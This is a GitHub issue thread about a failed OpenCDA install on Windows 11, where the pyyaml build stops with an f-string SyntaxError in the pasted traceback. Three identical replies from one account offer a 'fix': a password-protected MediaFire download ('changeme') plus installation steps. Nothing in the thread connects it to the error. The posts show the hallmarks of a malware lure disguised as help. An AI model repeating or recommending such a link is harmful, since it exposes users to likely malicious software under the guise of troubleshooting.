### ISSUE TITLE
Installation problems in Windows11

### ISSUE THREAD

**Issue by wawuqinghua** [ucla-mobility/OpenCDA#229]
While installing OpenCDA on Windows 11, an error keeps occurring during the python setup.py develop step:

`(opencda) C:\Users\Lenovo\OpenCDA>python setup.py develop
running develop
D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\command\easy_install.py:147: EasyInstallDeprecationWarning: easy_install command is deprecated. Use build and pip and other standards-based tools.
  EasyInstallDeprecationWarning,
D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\command\install.py:37: SetuptoolsDeprecationWarning: setup.py install is deprecated. Use build and pip and other standards-based tools.
  setuptools.SetuptoolsDeprecationWarning,
running egg_info
writing OpenCDA.egg-info\PKG-INFO
writing dependency_links to OpenCDA.egg-info\dependency_links.txt
writing requirements to OpenCDA.egg-info\requires.txt
writing top-level names to OpenCDA.egg-info\top_level.txt
reading manifest file 'OpenCDA.egg-info\SOURCES.txt'
adding license file 'LICENSE'
writing manifest file 'OpenCDA.egg-info\SOURCES.txt'
running build_ext
Creating d:\users\lenovo\anaconda3\envs\opencda\lib\site-packages\OpenCDA.egg-link (link to .)
OpenCDA 0.1.3 is already the active version in easy-install.pth

Installed c:\users\lenovo\opencda
Processing dependencies for OpenCDA==0.1.3
Searching for PyYAML>=5.1.0
Reading https://pypi.org/simple/PyYAML/
D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\pkg_resources\__init__.py:126: PkgResourcesDeprecationWarning:  is an invalid version and will not be supported in a future release
  PkgResourcesDeprecationWarning,
Downloading https://files.pythonhosted.org/packages/54/ed/79a089b6be93607fa5cdaedf301d7dfb23af5f25c398d5ead2525b063e17/pyyaml-6.0.2.tar.gz#sha256=d584d9ec91ad65861cc08d42e834324ef890a082e591037abe114850ff7bbc3e
Best match: pyyaml 6.0.2
Processing pyyaml-6.0.2.tar.gz
Writing C:\Users\Lenovo\AppData\Local\Temp\easy_install-224gvxin\pyyaml-6.0.2\setup.cfg
Running pyyaml-6.0.2\setup.py -q bdist_egg --dist-dir C:\Users\Lenovo\AppData\Local\Temp\easy_install-224gvxin\pyyaml-6.0.2\egg-dist-tmp-_f39d4ox
Traceback (most recent call last):
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\sandbox.py", line 156, in save_modules
    yield saved
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\sandbox.py", line 198, in setup_context
    yield
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\sandbox.py", line 259, in run_setup
    _execfile(setup_script, ns)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\sandbox.py", line 45, in _execfile
    code = compile(script, filename, 'exec')
  File "<fstring>", line 1
    (self.include_dirs=)
                      ^
SyntaxError: invalid syntax

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "setup.py", line 24, in <module>
    install_requires=_read_requirements_file(),
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\__init__.py", line 87, in setup
    return distutils.core.setup(**attrs)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\_distutils\core.py", line 185, in setup
    return run_commands(dist)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\_distutils\core.py", line 201, in run_commands
    dist.run_commands()
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\_distutils\dist.py", line 969, in run_commands
    self.run_command(cmd)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\dist.py", line 1208, in run_command
    super().run_command(command)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\_distutils\dist.py", line 988, in run_command
    cmd_obj.run()
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\command\develop.py", line 34, in run
    self.install_for_development()
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\command\develop.py", line 129, in install_for_development
    self.process_distribution(None, self.dist, not self.no_deps)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\command\easy_install.py", line 755, in process_distribution
    [requirement], self.local_index, self.easy_install
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\pkg_resources\__init__.py", line 791, in resolve
    replace_conflicting=replace_conflicting
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\pkg_resources\__init__.py", line 1075, in best_match
    return self.obtain(req, installer)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\pkg_resources\__init__.py", line 1087, in obtain
    return installer(requirement)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\command\easy_install.py", line 681, in easy_install
    return self.install_item(spec, dist.location, tmpdir, deps)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\command\easy_install.py", line 707, in install_item
    dists = self.install_eggs(spec, download, tmpdir)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\command\easy_install.py", line 900, in install_eggs
    return self.build_and_install(setup_script, setup_base)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\command\easy_install.py", line 1174, in build_and_install
    self.run_setup(setup_script, setup_base, args)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\command\easy_install.py", line 1158, in run_setup
    run_setup(setup_script, args)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\sandbox.py", line 262, in run_setup
    raise
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\contextlib.py", line 130, in __exit__
    self.gen.throw(type, value, traceback)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\sandbox.py", line 198, in setup_context
    yield
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\contextlib.py", line 130, in __exit__
    self.gen.throw(type, value, traceback)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\sandbox.py", line 169, in save_modules
    saved_exc.resume()
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\sandbox.py", line 143, in resume
    raise exc.with_traceback(self._tb)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\sandbox.py", line 156, in save_modules
    yield saved
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\sandbox.py", line 198, in setup_context
    yield
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\sandbox.py", line 259, in run_setup
    _execfile(setup_script, ns)
  File "D:\Users\Lenovo\anaconda3\envs\opencda\lib\site-packages\setuptools\sandbox.py", line 45, in _execfile
    code = compile(script, filename, 'exec')
  File "<fstring>", line 1
    (self.include_dirs=)
                      ^
SyntaxError: invalid syntax`
<img width="657" alt="屏幕截图 2024-08-29 125208" src="https://github.com/user-attachments/assets/d2cd59ad-0e07-4ca0-b7e1-f503d458826d">
<img width="738" alt="屏幕截图 2024-08-29 125128" src="https://github.com/user-attachments/assets/d6da6b68-cbf3-44cb-af03-c768a5171ab6">

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
